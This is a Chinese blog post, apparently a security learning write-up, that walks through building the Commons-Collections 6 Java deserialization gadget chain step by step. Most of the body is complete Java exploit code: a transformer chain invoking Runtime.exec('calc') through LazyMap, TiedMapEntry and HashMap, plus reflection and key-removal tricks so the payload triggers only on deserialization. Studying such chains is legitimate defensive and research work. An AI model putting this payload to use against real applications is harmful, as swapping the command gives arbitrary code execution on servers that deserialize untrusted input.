Commons-Collections6 反序列化 从0开始手写exp

最新推荐文章于 2023-02-17 16:50:49 发布
最新推荐文章于 2023-02-17 16:50:49 发布
阅读量2.1k 收藏
点赞数
文章标签: web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51458899/article/details/124100545
版权

CC6

cc6的出现弥补了前面的cc1的setValue的缺陷,使得它可以在高于jdk8u65的情况下使用,jdk11不行

ysoserial/CommonsCollections6.java at master · frohoff/ysoserial (github.com)

如何手写exp

可以看到

image-20220410151034589

后半段仍然与yso的cc1一致(一直到LazyMap.get)

调用了TiedMapEntry,进去

image-20220410151622473

hashcode里面调用了getvalue

image-20220410151712355

这里是map.get

key对应的value如果改成恶意的类就可以触发反序列化

然后瞄了一眼构造函数发现是一个简单的传参初始化,而且是Public类

可以直接用之前写的hashmap

Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value", "aaa");
        Map<Object,Object> lazyMap =  LazyMap.decorate(map,chainedTransformer);

        TiedMapEntry tiedMapEntry = new new TiedMapEntry(lazyMap, "aaa");

然后后面直接new TiedMapEntry并且完善构造方法

随后运用到hashmap的readObject来完成反序列化,加上

      
        Map<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"asas");

然后加上序列化反序列化

        serialize(map2);
        unserialize("ser.bin");

整个demo

package org.apache.commons.collections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.rmi.CORBA.Tie;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class ccone {
    public  static  void  serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public  static  Object  unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value", "aaa");
        Map<Object,Object> lazyMap =  LazyMap.decorate(map,chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");

        Map<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"asas");

        serialize(map2);
        unserialize("ser.bin");
    }
}

仍然有问题,假如你把unserialize("ser.bin");注释的话,那么会发现serialize的时候就已经触发链子了,究其原因是hash.put的put里面有触发的函数

所以我们需要使用反射的方法写一下

		Class c = LazyMap.class;
        Field field =  c.getDeclaredField("factory");
        field.setAccessible(true);
        field.set(lazyMap, chainedTransformer);

但是加上去后,

    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value", "aaa");
        Map<Object,Object> lazyMap =  LazyMap.decorate(map,new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");

        Map<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"asas");

        Class c = LazyMap.class;
        Field field =  c.getDeclaredField("factory");
        field.setAccessible(true);
        field.set(lazyMap, chainedTransformer);
        serialize(map2);
//        unserialize("ser.bin");
    }

仍然不可以谈计算器,经过下断点调试,会发现原来是

image-20220410154530875

这里直接跳过了,所以要把key删掉

lazyMap.remove("aaa");

完整demo

package org.apache.commons.collections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.rmi.CORBA.Tie;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class ccone {
    public  static  void  serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public  static  Object  unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value", "aaa");
        Map<Object,Object> lazyMap =  LazyMap.decorate(map,new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");

        Map<Object,Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"aaa");
        lazyMap.remove("aaa");

        Class c = LazyMap.class;
        Field field =  c.getDeclaredField("factory");
        field.setAccessible(true);
        field.set(lazyMap, chainedTransformer);
//        serialize(map2);
        unserialize("ser.bin");
    }
}

这样的话,序列化的时候不会触发恶意payload,反序列化才会触发

image-20220410155142127

image-20220410155125909

ththaiai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化(八)Common Collection 6分析
Vicl1fe的博客
09-26 311
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 java.io.Objec
CommonsCollection6反序列化链学习
m0_56069948的博客
04-04 868
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 CommonsCollection6 1、前置知识 1.1、HashSet HashSet 基于 HashMap 来实现的,是一个不允许有重复元素的集合。继承了序列化和集合 构造函数参数为空的话创建一个HashMap(),有一个参数的情况下,要创建指定容量的初始数值的哈希集合。
Java安全--CC1的补充和CC6
qq_64201116的博客
12-08 1157
我们看一下两条链子的分歧在哪里:从ChainedTransformer.transform()开始往下和上一次讲的链子是一样的,这里就不赘述了。不一样的是transformer调用的函数从TransformedMap.checkSetValue()变成了LazyMap.get()我们现在的目标是搜索那里调用了get方法-->也是AnnotationInvocationHandler需要利用的点在AnnotationInvocationHandler的invoke()里面,而学完动态代理我们知道Invocat
Common-Collections 6
Christ1na的博客
09-26 334
这个利⽤链可以在Java 7和8的⾼版本触发,没有版本限制,所以通用性较强
apache-commons-collections6反序列化链分析
12-02 417
apache-commons-collections6反序列化链分析 apache-commons-collections6反序列化链利用的也是通过TiedMapEntry.getValue方法调用一系列的transform方法执行系统命令的,下面就分析分析这条链 复现环境 JDK7+CommonsCollections1 漏洞分析 看到CommonsCollections6类的getObject方法,前面是很熟悉的Transformer数组构造,数组构造和ACC5也是一样的,这里直接在实例化Chained
[Java反序列化]—CommonsCollections6
Sentiment的博客
05-27 1044
前言 在开始前先回顾了一下之前的CommonsCollections1和URLDNS,因为本篇跟之前有一定联系,其次其实也是为了巩固下毕竟已经忘的差不多了。 接上篇,CC1的JDK版本需要低于8u71,AnnotationInvocationHandler类的readObject()方法在8u71以后逻辑就发生了改变,不能再利用了,所以就需要找一个绕过高版本的利用链—CommonsCollections6 分析 cc1的LazyMap链:readObject()->invoker()->get(
commons-collections-3.2.2-API文档-中文版.zip
05-01
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.1-API文档-中文版.zip
07-03
赠送jar包:commons-collections4-4.1.jar; 赠送原API文档:commons-collections4-4.1-javadoc.jar; 赠送源代码:commons-collections4-4.1-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.1.pom;...
commons-collections-3.2.2-API文档-中英对照版.zip
04-20
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.4-API文档-中英对照版.zip
05-04
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
commons-collections4-4.4-API文档-中文版.zip
05-09
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
exploits:一些实战中练习遇到,顺手写exp
04-16
exploits 一些实战中练习遇到,顺手写exp
Commons-Collections6分析
Le1a's Blog
03-23 2119
Java反序列化
CommonsCollections6分析
笑花大王
01-02 368
CommonsCollections6 LazyMap的漏洞触发在get和invoke中,完全没有setValue什么事,这也说明8u71后不能利用的原因和AnnotationInvocationHandler#readObject 中有没有setValue没任何关系在java8u71以后sun.reflect.annotation.AnnotationInvocationHandler#rea...
Java反序列化7-CommonsCollections6利用链分析
weixin_43263451的博客
07-30 341
利用hashSet.readobject触发hashmap.put()从而触发tiedmap.hashcode从而调用getvalue从而调用lazymap.get进而进入ChainedTransformer.tranform。ysoserial是利用hashset.readobject触发hashmap.put(),其实在hashmap.readobject中也会触发hashmap.put(),所以这里用的hashmap而不是hashset。hashset.add其实就是给其hashmap赋了个值。...
java--commoncollections6 反序列化利用学习
zyer
05-12 244
总结 上周花了一周的时间学习commoncollections1,对java反序列化利用好像有一丝丝的理解了。 暂时的思路就是:首先寻找存在对应方法的类,LazyMap-->get,TransformedMap-->setValue,put 从寻找一个存在readObject方法的类出发,通过寻找其它Object导致最后能触发上面的方法。 问题所在 从commoncollections1的学习发现,这条利用链对jdk版本有限制,高版本的jdk使用不了,具体原因就是在Java 8u71
java--commoncollections6 续
zyer
05-12 128
上篇文章我们使用了HashSet作为反序列化函数的出发点,其实HashSet也可以作为出发点,我们使用HashSet构造payload package com.zyer; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.Co
CommonCollections6链分析
Demodd的博客
03-20 4198
前言 ​ 本文参考b站白日梦组长仅做笔记记录,完全跟着他复现,大家可以参考他的视频学习。 Gadget分析 因为只看了cc1可以说cc6利用的是cc1的前半部分,一直到LazyMap.decorate Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("get
Java反序列化漏洞——CommonsCollections6链分析
Thunderclap的博客
02-17 562
实际上在java.util.HashMap#readObject 中就可以找到HashMap#hash() 的调⽤,去掉了最前⾯的两次调⽤,在HashMap的readObject⽅法中,调⽤到了hash(key) ,⽽hash⽅法中,调⽤到了key.hashCode()。ysoserial中,是利⽤java.util.HashSet#readObject 到HashMap#put() 到HashMap#hash(key),最后到TiedMapEntry#hashCode()。getValue方法。
依赖项 maven:commons-collections:commons-collections:3.2.2 易受攻击
最新发布
12-27
依赖项 maven:commons-collections:commons-collections:3.2.2 存在安全漏洞,易受到攻击。这个漏洞可能会被恶意攻击者利用来执行远程代码,造成严重的安全问题。因此,建议及时更新为最新版本或者采取其他安全措施来防止潜在的攻击。 针对这种情况,可以通过以下方式来解决问题: 1. 更新依赖项:查看最新的commons-collections版本,替换当前依赖项中的3.2.2版本,确保安装了最新的补丁以修复潜在的安全问题。 2. 检查依赖项:审查项目中的其他依赖项,确保没有其他存在安全漏洞的组件。 3. 监控漏洞公告:定期关注公告和安全通知,及时了解相关漏洞和补丁的信息,并在发现安全问题时及时采取措施加以修复。 为了保护系统和数据安全,事先预防是非常重要的。及时更新依赖项并加强安全意识教育,可以有效降低系统受攻击的风险,避免造成不必要的损失。同时,建议开发团队加强安全意识,适时对系统进行安全评估和漏洞扫描,以保障系统的安全稳定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值